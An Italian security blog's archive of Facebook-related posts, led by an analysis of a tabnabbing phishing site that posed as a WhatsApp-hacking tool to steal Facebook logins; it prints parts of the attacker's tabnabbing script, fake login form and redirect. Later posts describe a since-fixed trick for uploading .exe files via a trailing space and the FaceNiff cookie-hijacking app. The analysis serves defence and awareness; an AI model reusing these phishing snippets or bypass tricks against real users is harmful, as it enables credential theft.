Articoli

Tabnabbing, un caso reale di Phishing ai danni di Facebook

 Tabnabbing, un caso reale di Phishing

Grazie alla segnalazione di Claudio Rizzo (~Zip~) i primi giorni di Marzo 2014 abbiamo rilevato un particolare attacco di phishing ai danni di Facebook e del portale WhatsApp Hacking, la particolarità di questo attacco è lo sfruttamento della tecnica di Tabnabbing.

Il Tabnabbing è una tecnica di attacco informatico di tipo phishing con un minimo di arguzia in più.
Viene presentato infatti alla vittima un link ad una pagina internet del tutto innocua e con del contenuto interessante. L’utente medio ha ormai l’abitudine di navigare su più tab (schede) all’interno del suo browser e la pagina in questione sfrutta questa abitudine per cambiare d’aspetto nel momento in cui l’utente la lascia aperta per visitare una nuova tab. Il nuovo aspetto rispecchierà in tutto e per tutto quello di una pagina di accesso a dei servizi online in cui vengono chieste username e password (per esempio il sito di posteitaliane, quello di un homebanking oppure la pagina di login di gmail come riportato dal link esterno). La vittima, tornando sulla scheda del sito attaccante, non si ricorderà più che quella deriva da un link non sicuro che ha cliccato, potrà invece pensare che aveva aperto tale pagina senza aver ancora effettuato l’accesso. Ovviamente l’inserimento dei dati in questa pagina verranno inoltrati all’account dell’attaccante e l’utente verrà reinderizzato sul sito reale in modo che non si accorga di essere stato derubato delle credenzialità. {Wikipedia}

Visto il forte interesse a “controllare” le conversazioni altrui di WhatsApp l’utente medio che faceva una ricerca online trovava nei principali risultati il portale “WhatsApp Hacking”, sito ospitato gratuitamente presso un importante provider che offre domini di terzo livello gratuitamente. Il sito in questione è una copia speculare dell’originale http://www.whatsapphack.com ma tradotto in Italiano, il sito civetta era stato costruito per trafugare le credenziali di accesso degli utenti Facebook!

Grazie alla collaborazione del D3Lab siamo riusciti a ricostruire integralmente il portale ed abbiamo riprodotto in locale l’esperienza di navigazione, che vi proponiamo nel seguente video:

Entrando più nello specifico il sito internet era composto da i seguenti file:

  • home.php
  • index.php
  • send.php
  • tabnabbing.js
  • contatti.txt

Il file index.php incorporava questa porzione di codice:


<script language="javascript" src="tabnabbing.js"></script>
<meta charset="UTF-8" />
<title>Whatsapp Hack - Whatsapp Hack Tool</title>

che richiama il file tabnabbing.js che incorpora la seguente porzione di codice:


function createShield(){
div = document.createElement("div");
div.style.position = "fixed";
div.style.top = 0;
div.style.left = 0;
div.style.backgroundColor = "white";
div.style.width = "100%";
div.style.height = "100%";
div.style.textAlign = "center";
document.body.style.overflow = "hidden";

window.location = 'home.php'

var oldTitle = document.title;
var oldFavicon = favicon.get() || "/favicon.ico";

div.appendChild(img);
document.body.appendChild(div);
img.onclick = function(){
div.parentNode.removeChild(div);
document.body.style.overflow = "auto";
setTitle(oldTitle);
favicon.set(oldFavicon)
}

Come è possibile vedere il precedente Java Script crea l’effetto Tabnabbing, una volta che l’utente cambia il focus su un’altra pagina/applicazione automaticamente entra in azione lo script che va a caricare la pagina home.php! Tale pagina emula la pagina di accesso di Facebook con un form che rimanderà al file send.php per il salvataggio delle credenziali:

<form id="login_form" action="send.php" method="post" onsubmit="https://www.facebook.com">

quest’ultimo file send.php contiene invece la seguente porzione di codice che rimanda l’utente sull’autentico portale di Facebook mostrandoli una foto del Concorso Protagoniste della Creatività:


<meta http-equiv="refresh" content="0; url=https://www.facebook.com/photo.php?fbid=539777592726633&set=a.539291452775247.1073741830.539232656114460&type=3&theater">

Il file send.php contiene inoltre lo script di memorizzazione delle credenziali sottratte all’utente, porzione di codice che non riusciamo a mostrarvi perché nidificato all’interno del Hypertext Preprocessor  “<?php” – “?>” ma che abbiamo scoperto salverà le credenziali all’interno del file contatti.txt che al momento della nostra analisi conteneva più di 160 credenziali sottratte come è possibile vedere nel seguente screenshot appositamente oscurato:

Credenziali_Phishing_Web

In conclusione l’utente che cercava online un metodo per leggere le conversazioni di WhatsApp di una terza persona trovava tra i primi risultati di Google il sito internet http://whatsapphack.provider123.com, tale sito era una copia speculare dell’autentico sito www.whatsapphack.com ma tradotto in Italiano e non permetteva il download di alcuna applicazione, ma non appena si cambiava il focus del scheda/pannello del Browser magari per vedere una notifica su Twitter o un altro risultato della ricerca entrava in funzione lo script di Tabnabbing che sostituiva la pagina con un form di autenticazione di Facebook falso debito esclusivamente a sottrarre le credenziali.

Quanto prima provvederò a contattare tutti gli utenti coinvolti e gli avviserò che le loro informazioni sono state trafugate!

Ringrazio Claudio Rizzo per la segnalazione e Denis Frati del D3Lab per il supporto.

Facebook Hacker Cup 2013

facebook_hackercup

Facebook annuncia anche per il 2013 l’Hacker Cup, una competizioni internazionale tra programmatori suddivisa in tre fasi.

Le iscrizioni saranno aperte fino al 27 Gennaio mentre il primo turno di qualificazione vedrà il via il prossimo 25 e 27 Gennaio, i concorrenti verranno sottoposti a tre problemi online coloro che ne risolveranno almeno uno passano al primo round.

Seguiranno tre round online rispettivamente il 2, 9 e 16 Febbraio, i migliori 300 concorrenti uscenti accederanno all’ultimo round ed avranno diritto ad aver l’Hacker T-Shirt!

L’ultimo round verrà svolto in California il 22 Marzo 2013 ed in finalisti riceveranno i seguenti premi in denaro:

  • 1 ° classificato: 10.000 dollari
  • 2 ° classificato: 2.000 dollari
  • 3 ° classificato: 1.000 dollari
  • dal 4° al 250° posto:  100 dollari

Per maggiori dettagli potete accedere alla pagina ufficiale con tutti i dettagli.

Un grazie ai nostri 1000 Fan!

Con Grandissimo piacere lo scorso 25 Ottob2 2012 abbiamo raggiunto i 1000 “Mi Piace” sulla  nostra pagina ufficiale di Facebook! È quindi doveroso ringraziarvi per il vostro supporto, per tutte le segnalazioni e consigli che quotidianamente ci date!

Ogni vostro messaggio è per noi un prezioso messaggio per migliorare il Blog e per mantenere alto il vostro interesse!

Continuate a seguirci tramite Facebook, Twitter, Google+, eMail o RRS!

Grazie!

Al via la nuova edizione del Hacker Cup di FaceBook

Come lo scorso anno Facebook  da al via la seconda edizione del Hacker Cup, una prestigiosa gara riservata a tutti i programmatori i quali si dovranno sfidare per dimostrare il migliore Hacker.

La gara, come già accaduto lo scorso anno, si dividerà in cinque fasi: le prime tre si svolgeranno online, mentre le ultime due nel nuovo quartier generale di Menlo Park, in California, ovviamente a spese di Facebook.

A questi ultimi due round parteciperanno i 25 utenti che avranno ottenuto il punteggio più alto. Il vincitore, oltre al titolo di “campione del mondo”, si porterà a casa un premio in denaro di 5.000 dollari, al secondo spetteranno 2.000 dollari e al terzo classificato 1.000 dollari. Chi, invece, si piazzerà dal quarto al venticinquesimo posto avrà un premio di consolazione pari a 100 dollari. I 100 migliori hacker dovranno accontentarsi di una t-shirt.

L’iscrizione è aperta a tutti, basta collegarsi al sito ufficiale e seguire le istruzioni.

Fonte | Downloadblog

Vunerabilità in Facebook – Allegare file EXE nei messaggi privati

 

Nathan Power della SecurityPentest ha individuato una vulnerabilità nel processo di caricamento dei file sul noto social network Facebook. È comunemente possibile utilizzare Facebook Messanger per inviare file ad amici ma il sistema impediva di caricare file con estensione .EXE in quanto considerati portatori di virus.

Le ricerche effettuate da Nathan hanno sottolineato la possibilità di caricare un file eseguibile (.exe) grazie ad un semplicissimo escamotage, basta infatti aggiungere uno spazio al termine dell’estensione perché l’uploader di Facebook validasse il file. Per esempio il file “sono_un_virus.exe” non viene accettato mentre “sono_un_virus.exe ” viene processato senza problemi.

Se a questa vulnerabilità viene aggiunta la caratteristica di Windows di auto eliminare eventuali spazi contenuti nell’estensione dei file è possibile capire la pericolosità di questa procedura.

La vulnerabilità scoperta lo scorso 28 Ottobre 2011 è però già stata fixata da Facebook, ad oggi non è possibile utilizzare questo trucco.

FaceNiff, testiamo hijacking HTTP su Android

FaceNiff è una applicazione per Android che ricorda l’ormai famoso Plugin Firesheep per Firefox, l’applicato sfrutta il cookie snatching (scippo dei cookie) per catturare i dati login di un utente permettendo successivamente ad un malintenzionato di accedere alla sessione internet dell’ignara vittima.

FaceNiff opera su reti Wireless e le sessioni di autenticazione devono avvenire attraverso il protocollo HTTP,  permettendo di catturare i Cookie di:

  • Facebook
  • Twitter
  • Youtube
  • Amazon
  • Nasza-Klasa

la versione Demo permette di catturare dati esclusivamente di Facebook, invece a seguito di un pagamento di 4$ è possibile avere l’abilitazione anche agli altri portali.

FaceNiff necessita dei permessi di Root e lo potete scaricare sul sito ufficiale mentre dopo il salto trovate una breve video recensione.

Infine vi ricordo, per la vostra sicurezza, che è sempre meglio abilitare l’autenticazione tramite il protocollo HTTPS se supporta dal portale al quale volete accedere.

Continua a leggere

La Truffa della Pagina Pubblica della Moratti

Letizia Moratti, o chi per essa, ha sfoggiato un colpo basso agli utenti di Internet 2.0 per accaparrarsi molteplici Fan su Facebook.

Questa azione è stata attuata in vista del ballottaggi per le elezioni del sindaco Milanese del 29 e 30 Maggio 2011, l’utente attratto da una pagina promozionale di Sport accettando di visualizzare un video molto appetibile diventa automaticamente Fan della pagina ufficiale della Moratti.

E’ ufficialmente iniziata l’era dei Ballottaggi Online…

Vulnerabilità alle API di Facebook

Nelle ultime ore si è sentito molto parlare della dichiarazione effettuata da Symantec sulla vulnerabilità delle API di Facebook che permetterebbe alle applicazioni di accedere a dati sensibili di ogni utente registrato al famoso Social Network, compresa la password.

Ho particolarmente gradito l’intervento degli attivisti Anonymous Italia che hanno dimostrato l’effettiva vulnerabilità estrapolando negli ultimi mesi diversi dati di utenti generando una tabella contenente più di quattrocento dati. Nell’immagine di presentazione potete visualizzare uno estratto del report,  con la password volutamente oscurata, per chi invece volesse approfondire la vicenda può visualizzare questo PDF.

Report punta il dito sul Web 2.0

Un interessante puntata di Domenica 10 Aprile 2011 di Report punta il dito sul Web 2.0 mettendo nel mirino Facebook e le sue politiche della Privacy ma sono stati coinvolti nel servizio altri grandi nomi come Twitter, Google e Wikipedia.

Particolarmente importante la fase finale nel servizio dove di parla inizialmente di Spam e violazione delle leggi sulla Privacy ma anche della recente delibera dell’AGCOM ed infine di Wikileaks, da non trascurare la corretta distinzione tra il termine Hacker e Cracker durante tutta la puntata.

Follow Over Security on Facebook

Carissimi lettori ho il piacere di comunicarvi l’integrazione di Over Security con Facebook, da oggi ogni nostro nuovo articolo sarà relinkato immediatamente anche sul pagina ufficiale del Fan Club.

Inoltre vi ricordiamo che è possibile seguirci anche su Twitter o Feed Rss.